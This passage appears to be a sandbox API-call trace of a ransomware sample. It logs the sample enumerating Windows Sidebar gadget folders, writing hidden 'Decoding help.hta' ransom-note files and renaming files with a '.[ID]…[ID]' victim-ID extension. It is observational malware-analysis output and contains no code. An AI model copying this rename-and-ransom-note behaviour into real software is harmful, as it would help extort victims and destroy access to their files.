lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Clock.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\clock.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.070] FindNextFileW (in: hFindFile=0x5d8950, lpFindFileData=0x1d21fd30 | out: lpFindFileData=0x1d21fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x843c2419, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x843c2419, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x28e73115, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0058.070] FindClose (in: hFindFile=0x5d8950 | out: hFindFile=0x5d8950) returned 1 Thread: id = 445 os_tid = 0x444 [0044.812] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*", lpFindFileData=0x1d35fd30 | out: lpFindFileData=0x1d35fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8410 [0049.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.246] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1d35fd30 | out: lpFindFileData=0x1d35fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.246] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.246] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.246] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1d35fd30 | out: lpFindFileData=0x1d35fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8538749b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8538749b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x29088439, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x4f1c, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0049.619] lstrcpyW (in: lpString1=0x1110ba18, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0049.619] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 59 [0049.619] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" [0049.619] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\decoding help.hta")) returned 0xffffffff [0049.619] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x608 [0052.143] WriteFile (in: hFile=0x608, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d35fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d35fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.972] CloseHandle (hObject=0x608) returned 1 [0055.309] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.060] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0058.060] lstrlenW (lpString="drag.png") returned 8 [0058.060] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0058.060] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 59 [0058.060] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" [0058.060] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" [0058.060] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.060] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.060] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1d35fd30 | out: lpFindFileData=0x1d35fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eaffd21, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23730c68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.060] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0058.060] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0058.060] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0058.060] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0058.060] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 59 [0058.061] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US" [0058.061] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\en-US\\*.*" [0058.061] GlobalMemoryStatus (in: lpBuffer=0x1d35fd10 | out: lpBuffer=0x1d35fd10) [0058.061] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x11273fc8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x370 [0058.061] CloseHandle (hObject=0x370) returned 1 [0058.061] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1d35fd30 | out: lpFindFileData=0x1d35fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x290ae597, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x290ae597, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x290d46f5, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x23e2, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0058.061] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0058.062] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 59 [0058.062] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" [0058.062] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\decoding help.hta")) returned 0x1 [0058.062] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0058.062] lstrlenW (lpString="icon.png") returned 8 [0058.062] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0058.062] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 59 [0058.062] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" [0058.062] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" [0058.062] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.062] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.063] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1d35fd30 | out: lpFindFileData=0x1d35fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8057bdba, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8057bdba, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0058.063] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0058.063] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0058.063] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0058.063] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0058.063] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 59 [0058.063] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images" [0058.063] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\images\\*.*" [0058.063] GlobalMemoryStatus (in: lpBuffer=0x1d35fd10 | out: lpBuffer=0x1d35fd10) [0058.063] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10de6dc0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x370 [0058.064] CloseHandle (hObject=0x370) returned 1 [0058.064] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1d35fd30 | out: lpFindFileData=0x1d35fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8538749b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8538749b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291b8f29, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0058.064] lstrcpyW (in: lpString1=0x668fd0, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0058.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 59 [0058.064] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" [0058.064] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\decoding help.hta")) returned 0x1 [0058.064] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0058.064] lstrlenW (lpString="logo.png") returned 8 [0058.064] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*" [0058.064] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\*.*") returned 59 [0058.064] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" [0058.064] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" [0058.064] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.064] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\CPU.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\cpu.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.065] FindNextFileW (in: hFindFile=0x5d8410, lpFindFileData=0x1d35fd30 | out: lpFindFileData=0x1d35fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8538749b, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x8538749b, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x291b8f29, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0058.065] FindClose (in: hFindFile=0x5d8410 | out: hFindFile=0x5d8410) returned 1 Thread: id = 446 os_tid = 0x570 [0044.822] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*", lpFindFileData=0x1d49fd30 | out: lpFindFileData=0x1d49fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8790 [0049.246] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.247] FindNextFileW (in: hFindFile=0x5d8790, lpFindFileData=0x1d49fd30 | out: lpFindFileData=0x1d49fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.247] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.247] FindNextFileW (in: hFindFile=0x5d8790, lpFindFileData=0x1d49fd30 | out: lpFindFileData=0x1d49fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x871223e6, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x871223e6, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x296096cf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x406b, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0049.621] lstrcpyW (in: lpString1=0x10d66b60, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0049.622] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 64 [0049.622] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" [0049.622] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\decoding help.hta")) returned 0xffffffff [0049.622] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x61c [0052.143] WriteFile (in: hFile=0x61c, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d49fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d49fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0053.974] CloseHandle (hObject=0x61c) returned 1 [0055.309] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.070] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0058.070] lstrlenW (lpString="drag.png") returned 8 [0058.070] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*" [0058.070] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\*.*") returned 64 [0058.070] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" [0058.070] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" [0058.070] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\Currency.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\currency.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.070] FindNextFileW (in: hFindFile=0x5d8790, lpFindFileData=0x1d49fd30 | out: lpFindFileData=0x1d49fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x23671ecb, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", 